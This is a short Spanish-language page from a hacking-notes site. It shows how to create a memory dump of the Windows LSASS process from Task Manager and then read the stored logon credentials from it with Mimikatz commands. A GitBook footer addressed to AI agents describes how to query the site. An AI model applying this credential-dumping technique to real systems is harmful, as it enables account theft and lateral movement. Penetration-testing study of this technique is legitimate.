> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/active-directory/credentials/lsass-dump-via-task-manager.md).

# Extracción de LSASS mediante el Administrador de tareas

### Creación del volcado

En Windows:

```bash
Administrador de tareas -> Detalles -> lsass.exe -> Crear archivo de volcado
```

<figure><img src="/files/cfc6fa4ddeb1c3d1f49adb9cd15fa02e1709c35a" alt=""><figcaption></figcaption></figure>

El archivo normalmente se crea en:

* C:/Users/user1/AppData/Local/Temp

<figure><img src="/files/cff6ce594391d626b003f68330909210c2ffc701" alt="" width="481"><figcaption></figcaption></figure>

### Análisis del volcado con Mimikatz

Ejecutar:

```powershell
./mimikatz.exe
```

Luego cargamos el volcado:

```bash
sekurlsa::minidump C:/Users/user1/AppData/Local/Temp/lsass.DMP

sekurlsa::logonPasswords
```

Esto permite analizar la información presente en el volcado de memoria.

<figure><img src="/files/9491437c86a333811739ec39db2601adc4cf327c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/active-directory/credentials/lsass-dump-via-task-manager.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
